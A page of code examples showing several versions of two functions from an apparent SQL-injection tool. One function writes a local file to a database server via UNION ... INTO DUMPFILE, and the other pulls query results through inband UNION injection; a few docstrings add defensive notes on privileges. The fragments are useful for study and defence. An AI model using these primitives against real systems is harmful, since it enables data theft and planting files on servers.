Exemple #1
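    def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
        """
        Write the content of local file wFile to path dFile on the database
        server through a UNION query ending in INTO DUMPFILE.

        wFile is encoded with self.fileEncode(wFile, "hex", True) and the
        first element of the returned list is used as the SELECT payload.
        fileType is only used in log messages. When confirm is true,
        self.askCheckWrittenFile() is called afterwards.

        conf.paramFalseCond is forced to True for the duration of the query
        and is restored afterwards, including when the query raises.

        Defender's view: INTO DUMPFILE only succeeds when the database
        account holds the FILE privilege and the server allows writes to the
        destination (MySQL's secure_file_priv); a least-privilege application
        account removes this write primitive.
        """
        logger.debug("encoding file to its hexadecimal string value")

        fcEncodedList   = self.fileEncode(wFile, "hex", True)
        fcEncodedStr    = fcEncodedList[0]
        fcEncodedStrLen = len(fcEncodedStr)

        # The whole encoded file travels inside the request; 8000 is the
        # threshold hard-coded here for warning on GET-based injections.
        if kb.injPlace == "GET" and fcEncodedStrLen > 8000:
            warnMsg  = "the injection is on a GET parameter and the file "
            warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
            warnMsg += "bytes, this might cause errors in the file "
            warnMsg += "writing process"
            logger.warn(warnMsg)

        unionTest()

        oldParamFalseCond   = conf.paramFalseCond
        conf.paramFalseCond = True

        # conf is shared state: restore the flag even if the query raises,
        # otherwise every later request would run with paramFalseCond
        # stuck at True.
        try:
            debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
            logger.debug(debugMsg)

            sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
            unionUse(sqlQuery, direct=True, unescape=False, nullChar="''")
        finally:
            conf.paramFalseCond = oldParamFalseCond

        if confirm:
            self.askCheckWrittenFile(wFile, dFile, fileType)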
Exemple #2
def __goInband(expression,
               expected=None,
               sort=True,
               resumeValue=True,
               unpack=True,
               dump=False):
    """
    Return the parsed output of a SQL query obtained through an inband
    (UNION) SQL injection on the affected parameter.

    With resumeValue set, resume(expression, None) is consulted first. The
    result is flagged as partial when nothing was resumed, or when an
    integer was expected and the resumed text is not made of digits.
    An empty list is returned when there is no output to parse.
    """

    partial = False
    output = resume(expression, None) if resumeValue else None

    if resumeValue and (not output or
                        (expected == EXPECTED.INT and not output.isdigit())):
        partial = True

    # NOTE(review): only a None result triggers a fresh query; a resumed
    # value that is empty or fails the integer check is flagged partial but
    # is not fetched again here.
    if output is None:
        output = unionUse(expression, unpack=unpack, dump=dump)

    if not output:
        return []

    return parseUnionPage(output, expression, partial, None, sort)
Exemple #3
def __goInband(expression, expected=None):
    """
    Return the parsed output of a SQL query obtained through an inband
    (UNION) SQL injection on the affected parameter.

    A value stored in kb.resumedQueries for conf.url and this expression is
    tried first; when it is missing or empty, unionUse() runs the query.
    An empty list is returned when there is no output to parse.
    """

    partial = False
    output  = None

    # Truthy only when a previous session stored a value for this exact
    # URL and expression; the value is also handed to parseUnionPage().
    condition = (
                  kb.resumedQueries and conf.url in kb.resumedQueries.keys()
                  and expression in kb.resumedQueries[conf.url].keys()
                )

    if condition:
        output = resume(expression, None)

        # The resumed value is partial when it is empty, or when an integer
        # was expected and the text is not made of digits.
        if not output:
            partial = True
        elif expected == "int" and not output.isdigit():
            partial = True

    if not output:
        output = unionUse(expression, resetCounter=True)

    if not output:
        return []

    return parseUnionPage(output, expression, partial, condition)
Exemple #4
def __goInband(expression, expected=None):
    """
    Run a SQL query through an inband (UNION) SQL injection on the affected
    parameter and return its parsed output.

    The resume store (kb.resumedQueries, keyed by conf.url and then by
    expression) is checked before a request is made. An empty list is
    returned when neither the store nor unionUse() yields any output.
    """

    condition = (kb.resumedQueries and conf.url in kb.resumedQueries.keys()
                 and expression in kb.resumedQueries[conf.url].keys())

    output = resume(expression, None) if condition else None

    # Partial: a resume entry exists but is empty, or it should have been an
    # integer and is not made of digits.
    partial = False
    if condition and (not output or
                      (expected == "int" and not output.isdigit())):
        partial = True

    # Fall back to a live query only when nothing usable was resumed.
    output = output or unionUse(expression, resetCounter=True)

    return parseUnionPage(output, expression, partial, condition) if output else []
Exemple #5
    def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
        """
        Write the content of local file wFile to path dFile on the database
        server through a UNION query ending in INTO DUMPFILE.

        The payload is the first element returned by
        self.fileEncode(wFile, "hex", True). fileType is only used in log
        messages. When confirm is true, self.askCheckWrittenFile() is
        called afterwards.

        Defender's view: INTO DUMPFILE only succeeds when the database
        account holds the FILE privilege and the server allows writes to the
        destination (MySQL's secure_file_priv); a least-privilege application
        account removes this write primitive.
        """
        logger.debug("encoding file to its hexadecimal string value")

        hexPayload = self.fileEncode(wFile, "hex", True)[0]
        hexLength = len(hexPayload)

        # The whole encoded file travels inside the request; 8000 is the
        # threshold hard-coded here for warning on GET-based injections.
        if kb.injection.place == PLACE.GET and hexLength > 8000:
            logger.warn(
                "the injection is on a GET parameter and the file "
                "to be written hexadecimal value is %d "
                "bytes, this might cause errors in the file "
                "writing process" % hexLength
            )

        logger.debug("exporting the %s file content to file '%s'" % (fileType, dFile))

        unionUse("%s INTO DUMPFILE '%s'" % (hexPayload, dFile), unpack=False)

        if confirm:
            self.askCheckWrittenFile(wFile, dFile, fileType)
Exemple #6
def __goInband(expression, expected=None, sort=True, resumeValue=True, unpack=True, dump=False):
    """
    Run a SQL query through an inband (UNION) SQL injection on the affected
    parameter and return its parsed output.

    resumeValue controls whether resume(expression, None) is tried before
    a request is made; unpack and dump are forwarded to unionUse(), and
    sort to parseUnionPage(). An empty list is returned when there is no
    output to parse.
    """

    output = None
    partial = False

    if resumeValue:
        output = resume(expression, None)

        # The resumed value is partial when it is empty, or when an integer
        # was expected and the text is not made of digits.
        if not output:
            partial = True
        elif expected == EXPECTED.INT and not output.isdigit():
            partial = True

    # NOTE(review): only a None result triggers a fresh query; a resumed
    # value that is empty or fails the integer check is flagged partial but
    # is not fetched again here.
    if output is None:
        output = unionUse(expression, unpack=unpack, dump=dump)

    data = []
    if output:
        data = parseUnionPage(output, expression, partial, None, sort)

    return data